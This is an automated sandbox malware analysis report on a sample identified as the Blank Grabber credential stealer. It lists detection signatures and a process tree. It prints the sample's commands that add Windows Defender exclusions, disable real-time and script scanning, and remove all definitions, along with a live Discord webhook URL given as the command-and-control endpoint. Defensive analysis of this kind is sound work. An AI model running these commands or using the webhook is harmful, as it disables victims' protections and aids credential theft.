Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
Analysis ID:1543368
MD5:3c1b1f453e5f9f0d71f7862d2d6235fe
SHA1:2092b1b88e17b165ea635b136aceecb05c54e042
SHA256:984156f2a09823ce55d34fab0738e81d086b4599dbba3b1f6282aa3cce64524a
Tags:BlankGrabberexe
Infos:

Detection

Blank Grabber
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Blank Grabber
Yara detected Powershell download and execute
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Check if machine is in data center or colocation facility
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Modifies Windows Defender protection settings
Removes signatures from Windows Defender
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Suspicious Script Execution From Temp Folder
Uses ipconfig to lookup or modify the Windows network settings
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect virtual machines (SGDT)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe (PID: 7612 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe" MD5: 3C1B1F453E5F9F0D71F7862D2D6235FE)
    • SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe (PID: 7664 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe" MD5: 3C1B1F453E5F9F0D71F7862D2D6235FE)
      • cmd.exe (PID: 7692 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7780 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7700 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7820 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
          • WmiPrvSE.exe (PID: 7600 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • MpCmdRun.exe (PID: 2624 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)
      • cmd.exe (PID: 7752 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7920 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7796 cmdline: C:\Windows\system32\cmd.exe /c "start bound.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • bound.exe (PID: 7976 cmdline: bound.exe MD5: 2A4DCF20B82896BE94EB538260C5FB93)
          • conhost.exe (PID: 8028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7400 cmdline: "cmd" /c ipconfig /all MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • ipconfig.exe (PID: 1512 cmdline: ipconfig /all MD5: 62F170FB07FDBB79CEB7147101406EB8)
          • WerFault.exe (PID: 2024 cmdline: C:\Windows\system32\WerFault.exe -u -p 7976 -s 2228 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
      • cmd.exe (PID: 7852 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 8044 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7936 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 8184 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
  • cleanup

Malware Configuration

Threatname: Blank Grabber

{"C2 url": "https://discord.com/api/webhooks/1299279521836433439/GoUGaI0qQnNvUez_tVUOCPj55nOrj_OQnwDZRVe4JnsR8fWm3B0OhLukLX3stEIlIXzc"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\_MEI76122\rarreg.keyJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
    dropped/ConDrvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000002.00000003.1409163112.000001DCB59D9000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
        00000002.00000003.1407566160.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
          00000000.00000003.1393387910.000001C12B872000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
            00000002.00000003.1408378616.000001DCB591D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
              00000002.00000003.1407872022.000001DCB58FA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
                Click to see the 8 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, ParentProcessId: 7664, ParentProcessName: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe'", ProcessId: 7692, ProcessName: cmd.exe
                Sigma detected: Powershell Defender Disable Scan Feature
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, ParentProcessId: 7664, ParentProcessName: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 7700, ProcessName: cmd.exe
                Sigma detected: Suspicious Script Execution From Temp Folder
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7752, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe', ProcessId: 7920, ProcessName: powershell.exe
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, ParentProcessId: 7664, ParentProcessName: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe'", ProcessId: 7692, ProcessName: cmd.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7692, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe', ProcessId: 7780, ProcessName: powershell.exe
                Sigma detected: Suspicious Network Command
                Source: Process startedAuthor: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io': Data: Command: "cmd" /c ipconfig /all, CommandLine: "cmd" /c ipconfig /all, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: bound.exe, ParentImage: C:\Users\user\AppData\Local\Temp\bound.exe, ParentProcessId: 7976, ParentProcessName: bound.exe, ProcessCommandLine: "cmd" /c ipconfig /all, ProcessId: 7400, ProcessName: cmd.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-27T18:44:34.269854+010028033053Unknown Traffic192.168.2.949785172.67.203.125443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Found malware configuration
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe.7664.2.memstrminMalware Configuration Extractor: Blank Grabber {"C2 url": "https://discord.com/api/webhooks/1299279521836433439/GoUGaI0qQnNvUez_tVUOCPj55nOrj_OQnwDZRVe4JnsR8fWm3B0OhLukLX3stEIlIXzc"}
                Multi AV Scanner detection for submitted file
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeReversingLabs: Detection: 52%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeJoe Sandbox ML: detected
                Source: unknownHTTPS traffic detected: 172.67.203.125:443 -> 192.168.2.9:49767 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.203.125:443 -> 192.168.2.9:49785 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 128.116.123.4:443 -> 192.168.2.9:49792 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.20.23.46:443 -> 192.168.2.9:49809 version: TLS 1.2
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                Source: Binary string: System.Data.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: mscorlib.pdb8* source: WER40B.tmp.dmp.29.dr
                Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: bound.exe, 00000011.00000002.1605507236.00000254B6D83000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: System.Windows.Forms.ni.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
                Source: Binary string: System.Drawing.ni.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER40B.tmp.dmp.29.dr
                Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1469630464.00007FF8E6B32000.00000040.00000001.01000000.0000000F.sdmp
                Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387564300.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1499835574.00007FF8F8754000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
                Source: Binary string: System.Drawing.ni.pdbRSDS source: WER40B.tmp.dmp.29.dr
                Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\bound.PDB] source: bound.exe, 00000011.00000002.1610583580.00000254CF206000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Xml.ni.pdbRSDS# source: WER40B.tmp.dmp.29.dr
                Source: Binary string: System.Core.ni.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: System.Numerics.ni.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1499519391.00007FF8F8301000.00000040.00000001.01000000.00000006.sdmp
                Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1493380127.00007FF8E80D1000.00000040.00000001.01000000.00000011.sdmp
                Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER40B.tmp.dmp.29.dr
                Source: Binary string: mscorlib.ni.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1498932456.00007FF8E83BB000.00000040.00000001.01000000.00000008.sdmp
                Source: Binary string: System.Core.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1499164616.00007FF8F0D01000.00000040.00000001.01000000.00000009.sdmp
                Source: Binary string: System.Xml.pdbX`h0a source: WER40B.tmp.dmp.29.dr
                Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1496149556.00007FF8E8131000.00000040.00000001.01000000.0000000C.sdmp
                Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER40B.tmp.dmp.29.dr
                Source: Binary string: D:\a\1\b\bin\amd64\python313.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1474323542.00007FF8E72E8000.00000040.00000001.01000000.00000004.sdmp
                Source: Binary string: System.Runtime.Serialization.ni.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1488870171.00007FF8E7A07000.00000040.00000001.01000000.00000013.sdmp
                Source: Binary string: System.Xml.ni.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: System.Runtime.Serialization.ni.pdbRSDSg@h source: WER40B.tmp.dmp.29.dr
                Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1469630464.00007FF8E6BCA000.00000040.00000001.01000000.0000000F.sdmp
                Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1490107533.00007FF8E7AA5000.00000040.00000001.01000000.00000010.sdmp
                Source: Binary string: System.ni.pdbRSDS source: WER40B.tmp.dmp.29.dr
                Source: Binary string: System.Configuration.ni.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387564300.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1499835574.00007FF8F8754000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
                Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1497747676.00007FF8E81F1000.00000040.00000001.01000000.0000000B.sdmp
                Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1469630464.00007FF8E6BCA000.00000040.00000001.01000000.0000000F.sdmp
                Source: Binary string: System.Configuration.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: System.Data.ni.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: System.Data.ni.pdbRSDSC source: WER40B.tmp.dmp.29.dr
                Source: Binary string: System.Xml.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: System.pdb source: bound.exe, 00000011.00000002.1605507236.00000254B6D83000.00000004.00000800.00020000.00000000.sdmp, WER40B.tmp.dmp.29.dr
                Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WER40B.tmp.dmp.29.dr
                Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1500164884.00007FF8F9181000.00000040.00000001.01000000.0000000D.sdmp
                Source: Binary string: System.Data.pdbH source: WER40B.tmp.dmp.29.dr
                Source: Binary string: System.Windows.Forms.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: mscorlib.pdb source: WER40B.tmp.dmp.29.dr
